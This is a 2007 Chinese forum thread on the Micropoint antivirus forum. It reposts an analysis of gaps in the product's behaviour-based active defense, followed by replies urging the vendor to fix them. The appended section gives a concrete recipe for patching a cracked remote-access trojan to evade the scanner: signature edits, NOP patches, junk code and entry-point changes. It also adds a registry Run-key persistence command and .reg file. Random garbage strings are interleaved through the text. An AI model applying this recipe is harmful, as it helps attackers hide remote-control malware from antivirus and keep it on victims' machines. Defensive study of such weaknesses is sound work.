微点交流论坛

标题: 绕过微点主动防御可行性的分析(转的) [打印本页]

作者: nonlinear 时间: 2007-10-24 21:34 标题: 绕过微点主动防御可行性的分析(转的)

也不知道能不能有用，今天在远景论坛找DefenseWall资料的时候看到的，一直想为微点做点什么(微点预升级板一直在用，但还没遇到过什么大问题)。
这是该网页地址 http://bbs.pcvista.cn/read.php?tid=14026
转载注明 http://hi.baidu.com/zqinyan/ |EKu2We*
EIjI!0j
微点的主动防御确实是一种对付免杀病毒，变种病毒，家族病毒乃至未知病毒的一种行之有效的方法。 b_TS<,
此方法抛弃了传统的特征码对比识别的落后局面对于病毒编写者来说无疑是巨大的打击 oH^(qZ8W
Q8D&tJg
主动防御是对付病毒的杀手锏那么是否就是完美的防御手段了呢？它都有那些特点呢？它是不是也有一些不足之处能够被恶意利用呢？ ,E;;wdIt
r X'*|]
:O-iykXyI
========== :~F:/5
r%@Lej5+
6e,xDr
g{IF_ 1
XV3C`:b
dU)]:>Uz
1、在实际使用微点的过程中可以发现，在识别病毒时，微点总是在病毒已经运行了一会后，才弹出来提示框。也就是说，微点在拦截到某程序的前后一系列API动作后，需要将拦截到的动作与行为知识库中的记录进行对比，用以判断该程序是否为病毒。 ~{hxR)x9
N|N3x7=gs
也就是说从拦截程序的API动作到行为识别之间有一个时间差 @ "a6fn
\B F*m"lz
n0Y+b[ +wj
W} WI; cI
8fA_p}wp
Uc/+gz Z;
F, U*yj
2、通过大量实验可以得出微点具有一个临时规则的功能并且该功能生成的临时规则在计算机重启之前都能一直生效 W3`>8v1?o
t78k4?
用过微点的用户都知道，当微点通过主动防御发现一个病毒后，会有询问框出现，让用户选择是允许还是阻止，当选择阻止后，会出现询问框让用户选择是删除还是不删除。 3?Y2L
WJI[9@^I~
不论是选择阻止/删除还是允许/不删除，微点都会将此选择添加为临时规则 9UvXC)R1
R<B7K?SxV~
如果是选择阻止/删除，那么在重启之前，遇到相同路径和hash值的文件都会阻止或者删除；如果是选择允许/不删除，那么在重启之前，遇到相同路径和hash值的文件就都会放行 AT5aDEb^^
Nk {XdrY
并且微点还会记录下父进程，如果同一父进程，第一次的操作没报，但是如果第二次的操作是有害的，那么如果在第二次选择删除的话，那么微点会把在第一次操作生成的文件连同父进程一起让用户选择删除。 z=$jGL
#s!'+|2n
这真是一个很神奇的功能    也许也是一个不足之处 znJ'iV f
37; $-cFE
cV`E>w=D0
>2By +/!X
t!I aUW
]D,MiDph
=~+DUMBT
3、微点之所以能够发现未知病毒是建立在大量的对病毒行为分析的基础之上的 5/O'R9A4
san,|yrMn
比如auto类病毒，都需要通过autorun.inf这个文件来运行，然后对系统进行破坏    那么一个程序如果具有以下auto类病毒的常见动作既可被微点报为auto病毒哪怕这个病毒是微点还为收集到的也就是未知的病毒 Reu*Pe
`~cuQ<3Tn
1、通过autorun.inf文件运行    2、向系统目录创建文件    3、向本地磁盘跟目录创建文件 4、修改一些注册表（如启动项服务） f0T ,ul,
n>'Kp T9|
但是别忘了，微点是通过一系列动作的对比来确定是否为病毒的所以这也是正规光盘在自启动时不会被报病毒的原因所在 L dn8
lq"f[-8a2q
那么，如果将病毒的一系列行为拆散，使之不能联贯；或者将动作减少，使之与行为分析库中的动作对不上号 HfLLlH<L`&
@ps1Dr4s
那么微点还能报病毒么？    事实是，对于这类单一的动作而言，微点不会报病毒，但是有可能会报危险动作（重要单一API动作报警） ~g7l8H67
RV&^g*;E
eu|j=mB
3R&lqxhg
q:<{% U$
＝＝＝＝＝＝＝＝＝＝＝ eznypY=
V i&*&"q
9h0X&1u
Gy[O)PEEh
~y$ !48o
于是，可以结合以上所发现的不足之处来绕过微点主动防御的监控。 -8N|xQ378
可参见以下2贴 rDdzxrKg{
,&4qgp{)
http://bbs.deepin.org/htm_data/207/0710/342647.html Bb{!Yh].:A
http://bbs.kafan.cn/viewthread.php?tid=139077&extra=page%3D1 J1XL<7
`Bn=?9
如以上贴中所录制的视频既是利用了上面所分析的不足之处 I\ | N
dO7;}>F$n
里面的那个vbs脚本的作用就在于无窗口运行spbic.exe （利用的第三点）    运行成功后，未等微点将拦截到的动作与行为库里的记录对比便立即重启（利用的第一点）所以该病毒能够绕过微点的主动防御并存活下来 _ q(Q
vVT?h
如果继续对该病毒的破坏动作进行修改，那么，重启之后由于无法与现有行为库里的行为进行有效对比，那么微点也会对该病毒放行（利用第三点） I?Q+9Rmm`J
oPKXZU(c
2i|B=D(
希望微点官方能够设法弥补以上的不足之处。 5jq=_mHt
>NV=LOO
A<YsfDa_d
VF0dE
========================= !PUp>(
y,+[$u7h
4}KU>9YRA
)"O{D`uX
i RmQ5ezk
4f1D*id*`#
't>r sp+#
K^i"9D)A
附：对上兴的修改，过微点的主动防御(利用第三点) ? J|4l[x
@oH[SWx
0P 5BArJ?
上興是2007sp3 http://hi.baidu.com/98223上破解的這個 !7` [i
上興生成的時候什么都不要選生成以后先改文件特征碼 0009B71D_00000001(通用的) cCng5Nq,c
H%.zXQ4}n
od載入 (內存地址或許會有不同吧 ..) U1^l+G^,~
0049BADA    E8 11F7FEFF    call r_server.0048B1F0 '?}R4w|)
0049BADF    33C0          xor eax,eax ;F,qS0lzE
0049BAE1    5A          pop edx /W9 &Ke
0049BAE2    59          pop ecx 00,9azs
0049BAE3    59          pop ecx 104!!m
0049BAE4    64:8910       mov dword ptr fs:[eax],edx f#mx:Q.7I
d"!yD/RD
全部nop掉這樣上興就不會生成服務(其實這是我一開始做的 ..) wEK%T P4
`;}H%
0049BB0C    E8 F7B6F6FF    call <jmp.&kernel32.WinExec> - &NQ \W
0049BB11    33C0          xor eax,eax C;%Y\S
把 xor eax,eax改為int 21 (>mi!:
6#O#T;f)
在此處加花 ] ZDTn
0049C322 B% 2L1T=
-------------------- ZWFG?8lJ
xor eax,eax M5F(<,n;
pushad xv^Sh}\}
popad '7t|I6$ow
jmp 0049C28C {> wI8
-------------------- sZ]'DH&_(
0049C28C 是原入口點 jYrym-
C/CN '
用loadpe改入口點為0049C322 yQ8M >H#J
至此做出來的上興已經是可以過微點的殺毒模塊了(防火墻過不了) ;0;3BH A
而且上線和遠端控制也沒有問題 m~##q}LZ
mgo'M W\
但是其本身不會添加任何啟動項需要其余文件執行 6lN?)<uQ
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v spbat /t REG_SZ /d "c:\program files\common files\microsoft shared\msinfo\test.exe" /f 這命令來加入啟動項這樣才能讓它在重啟后繼續運行 '&RZ3@}+
lO551Y^
或者reg import 1.reg M7`UoTc+>d
1.reg的內容: g ^D)x[
Windows Registry Editor Version 5.00 w~bG<kxP
$ 1ak I
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] DH}s1mNMP
"test"="c:\\program files\\common files\\microsoft shared\\msinfo\\test.exe" 0lLr[

[ Last edited by nonlinear on 2007-10-25 at 20:09 ]

作者: 998csc 时间: 2007-10-24 21:59
看的好辛苦啊.

作者: same999 时间: 2007-10-25 11:29
看起累，而且还没明白，希望转载的时候弄个清楚的

作者: kahaixiao007 时间: 2007-10-25 12:00
楼主最后再编辑整理一下……
辛苦了……

作者: peter0605 时间: 2007-10-25 12:05
以前有看到过。。。但是这样放出来了应该解决了吧？

作者: kahaixiao007 时间: 2007-10-25 12:11
关键是天下万物，有盾就有矛，矛和盾始终在较量，不断的发展，关键是看哪个盾的应变性安全性更好……

作者: Linwin 时间: 2007-10-25 12:19
放出来后，要MP去想办法解决呀...

作者: anpro 时间: 2007-10-26 08:35
值得研究！微点在对病毒的防御，一般建立在对可疑文件活动的分析上，这方面涉及到操作系统的底层技术，相对于普通杀软，难度要大一些。

作者: zwh_zyc168 时间: 2007-10-26 09:35
看了下，希望官方参考下，看微点是否存在或者修改此类问题，并作以公告别让新手误导了呀，！
楼主给你加10分呵呵

作者: 海之魂 时间: 2007-10-26 12:53
既然提出来了，就看微点如何堵漏啦。

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn